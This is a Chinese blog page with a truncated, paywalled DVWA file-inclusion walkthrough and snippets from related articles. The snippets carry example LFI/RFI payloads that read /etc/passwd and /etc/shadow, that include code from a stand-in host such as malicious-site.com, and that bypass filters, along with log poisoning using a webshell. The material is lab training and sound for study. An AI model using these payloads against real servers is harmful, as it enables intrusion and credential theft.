DVWA通关攻略之文件包含

最新推荐文章于 2025-10-12 22:28:28 发布
原创 最新推荐文章于 2025-10-12 22:28:28 发布 · 1.7k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #服务器 #网络安全 #web安全 #安全

文章详细介绍了文件包含漏洞的概念,包括本地文件包含(LFI)和远程文件包含(RFI),并通过DVWA平台的实验演示了不同安全级别下的漏洞利用方法,如使用双写绕过和file协议。同时,提出了防御措施,如文件白名单验证和禁止目录跳转字符。

目录

1.file include 文件包含

一些web应用程序允许用户指定需访问的文件,或者允许用户将文件上传到服务器。稍后,web应用程序处理访问用户提供的输入。通过这样做,web应用程序存在恶意文件执行的可能性。如果被包含的文件在目标计算机本地,则称为“本地文件包含(Local File Inclusion,LFI)”。但被包含文件也可能在其他机器上,这种攻击就是“远程文件包含(Remote File Inclusion, RFI)”。
当php.ini开启allow_url_include时,就可以使用以下四个函数进行文件包含。再开启allow_url_fopen(默认关闭)就可以包含远程文件。
require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。
include(),找不到被包含的文件时只会产生警告,脚本将继续运行。
include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
require_()与require()类似,唯一的区别就是如果该文件中的代码已经被包含,则不会再次包含。

2.实验演示

在DVWA页面左侧选择File Inclusion。
目标是只使用文件包含来读../hackable/flags/fi.php内的五句话。

2.1.low

DVWA Security设置为low,即开发者没有采取任何保护措施。
在这里插入图片描述

在页面上点击三个文件名会显示不同内容,查看URLhttp://127.0.0.1/DVWA/vulnerabilities/fi/?page=include.php。了解到是通过page=点击的文件名来显示相应内容,那么可能存

最低0.47元/天 解锁文章
dvwa文件包含、文件上传
anddddoooo的博客
10-09 1241
上面的逻辑是,如果参数没有file字符串,且不是include.php,直接过滤,所以这个情况不能使用远程文件包含了。本地文件包含不用什么测试环境,只要有个文件,就能知道其是否触发,远程文件包含需要我们写个php代码,如下。上传的文件会成为md5值.png或md5值.jpg的形式,web服务器不会将其解析为php文件。本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等。文件,而文件内容如下:<?../../../../../../test.txt能将文件读出。
文件包含漏洞(DVWA靶场文件包含漏洞详解)
tmzy1的博客
03-25 2415
浏览器中运行此日志文件,即可执行插入的PHP代码。注意:若是一句话代码,就可以控制此服务器了。查看日志文件已记录此条信息。1、文件包含漏洞形成原因。2、文件包含漏洞的分类。3、PHP包含日志文件。
DVWA通关全解
最新发布
hj06112的博客
10-12 677
主要介绍DVWA的详解
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员理解web应用保护的过程,还可以在课堂中为师生的安全性教学提供便利。DVWA是一个RandomStorm开源项目,了解更多关于RandomStorm开源项目可以访问 http://www.randomstorm.com。DVWA项目开始于2008年12月,并逐渐受到欢迎。 现在,全世界有成千上万的安全专业人员,学生和教师正在使用它。 DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVWA——文件包含
m0_74426634的博客
04-06 2557
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
DVWA-文件包含
STTTM的博客
12-21 2446
  什么是文件包含?在文件包含里面,我们要想方设法把真正包含的文件掉包,换成恶意文件,服务器却不知道。 文件包含:是一种代码处理方式,当一个代码文件想要引用另外一个代码文件,就要用到包含,常见的包含函数有include、require等,参数是文件名。但是如果文件包含的参数用户可控且过滤不严,被攻击者偷梁换柱。 LOW等级: 首先进行正常的操作:点击fil1和file2时,仅仅是配...
DVWA通关攻略之文件上传
hongji728696的博客
09-04 1225
文件上传漏洞原理:服务器端没有对文件上传进行严格的过滤,导致上传的文件可以被解析成可执行的脚本文件,获取服务器端的shell对服务器进行控制,以达到攻击目的。
文件包含漏洞:pikachu与DVWA靶场中的文件包含漏洞通关
qq_68163788的博客
05-27 2357
文件包含漏洞是一种常见的Web安全漏洞,攻击者可以通过包含恶意文件来执行任意代码或获取敏感信息。在DVWA靶场中,通过利用文件包含漏洞,可以获取系统文件、敏感信息或者执行恶意代码。pikachu可以通过构造恶意文件路径,利用DVWA中的文件包含漏洞来获取管理员权限或者对系统进行攻击。为了防范文件包含漏洞,开发者应该避免直接包含用户输入的文件,并且对输入进行严格的过滤和验证。通过了解和掌握文件包含漏洞的原理和利用方法,可以帮助提高Web应用程序的安全性。
DVWA通关--文件包含(File Inclusion)
箭雨镜屋
01-13 4684
LOW 通关步骤 一、本地文件包含 1、先搞清楚要干啥,当然可以像DVWA通关--文件上传(File Upload)的HIGH关一样,结合文件上传漏洞,包含木马,但是总做一样的事情未免有点没意思。 点右下角的View Help看了一下,File Inclusion这套关卡要求读取../hackable/flags/fi.php这个文件中的5个引用,也就是5个名言名句。 这个是本地文件包含的要求,后面也会一并尝试远程文件包含。 我在服务器上面看了一下这个文件的内容,如下图 可见1、2、4是直
DVWA通关攻略之暴力破解
勿山几已
04-27 5145
在攻击中,在不知道用户名或密码的情况下,使用这种手段对应用系统的认证信息进行获取,其过程就是通过工具软件利用字典文件使用大量的认证信息在认证接口进行挨个尝试,直到得到正确的结果,从而最终将用户名或密码破解出来。弱口令包括容易被攻击着猜测或被破解工具破解的口令,产品默认口令,与用户名关联的口令即口令和账号名相关,仅包含简单数字和字母的口令,例如"123"、"abc"等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。如果用户的口令是弱口令,此时爆破的成功率非常高。
DVWA 文件包含
m0_56107268的博客
04-30 419
Low <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 没有做任何的现在,可以直接进行文件包含 本地包含: 远程服务器包含 : Medium <?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "...
DVWA-文件包含漏洞
热门推荐
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
DVWA全系列-文件包含
leriger的博客
09-24 2276
文件包含漏洞属于漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。几乎所有脚本语言都会提供文件包含的功能。文件包含的原理PHP中提供了四个文件包含的函数,分别是include()、include_once()、require()和require_once()。这四个函数都可以进行文件包含,但作用并不一样。require:找不到被包含的文件时会产生致命错误,并停止脚本。
DVWA篇_文件包含
06-01 529
这里以Apache为例,每次成功访问的记录都会记录在access.log下,访问失败的记录会记录在error.log下。使用fnmatch函数匹配以file开头的文件,我们可以使用file://伪协议绕过。对http(s)://、../、..\\进行了过滤,可以双写关键字来绕过。首先在文件上传处上传有写功能的木马,.txt或者.php都可以。将http://=>hthttp://tp://便可绕过。这时再查看日志文件,发现恶意代码成功被写入日志文件中。这时使用文件包含漏洞,目录遍历去包含日志文件。
DVWA文件包含
weixin_46429206的博客
12-03 3203
Windows 本地文件包含 低 查看源码 不存在过滤,可直接读取或执行文件内容 中 源码中存在一些过滤规则,我们只需要进行复写或者大小写转换即可绕过 1、使用绝对路径 2、使用相对路径复写或者是大小写绕过 高 要求文件变量以file开头,因此远程文件包含失效,只能使用本地文件包含,且需要用到file协议 Linux 低 中 因为源码里过滤的是http和https,因此不影响我们使用相对路径和绝对路径 远程文件包含 低 Shell.php内容 攻击者访问受害者shell.php文件
dvwa文件包含
m0_57379855的博客
03-11 509
dvwa文件包含DVWA-File InclusionlowMediumHighImpossible DVWA-File Inclusion low Medium 思路:可以双写绕过 High Impossible 使用白名单的方式防御文件包含
dvwa文件包含通关
01-11
### DVWA 文件包含漏洞 解题思路及方法 #### 低安全级别(Low Level) 在低级别的文件包含漏洞测试中,应用程序允许用户通过URL参数指定要包含的PHP文件。由于缺乏任何验证或过滤措施,攻击者可以轻松利用此漏洞来加载任意本地文件或远程文件[^1]。 ```php <?php $page = $_GET['page']; include($page . ".php"); ?> ``` 这种实现方式使得攻击者可以通过修改`page`参数值为恶意路径来进行攻击。例如: - `?page=../../../../etc/passwd%00` - `?page=http://malicious-site.com/malicious_code.php%00` 这些请求会尝试读取服务器上的敏感文件或将外部恶意脚本引入到目标网站内运行。 #### 中级安全级别(Medium Level) 中级增加了基本的安全防护措施——黑名单过滤器。尽管如此,仍然存在绕过的方法。该版本会对输入数据中的某些危险字符进行检测并阻止它们被处理;然而,这种方法并不完善,因为总有新的未预见模式能够避开现有规则[^2]。 ```php <?php $blacklist = array("..", "//", "ftp:", "http:"); foreach ($blacklist as $item) { if (strpos($_GET['page'], $item)) die('Not allowed!'); } $page = $_GET['page']; include($page . ".php"); ?> ``` 虽然这里实现了简单的字符串匹配检查,但是并没有完全消除风险。比如使用编码技术或者找到其他合法但具有相同效果的方式都可以成功实施攻击。 #### 高级安全级别(High Level) 高级别的防御策略采用了更严格的控制手段,即只接受预定义列表内的页面名称作为有效的输入选项之一。这意味着只有特定几个已知且受信任源才能被执行,从而大大降低了潜在威胁发生的可能性[^3]。 ```php <?php $allowed_pages = ['include', 'file1', 'file2', 'file3']; if (!in_array($_GET['page'], $allowed_pages)) exit; $page = $_GET['page']; include($page . ".php"); ?> ``` 这种方式有效地防止了非法文件的包含操作,并确保系统的安全性得到了显著提升。 #### 安全建议 为了更好地保护Web应用免受此类攻击的影响,在开发过程中应当遵循以下最佳实践: - 使用白名单而非黑名单; - 对所有来自用户的输入进行全面验证; - 尽可能减少动态文件包含的功能范围; - 实施适当的错误处理机制以应对意外情况的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值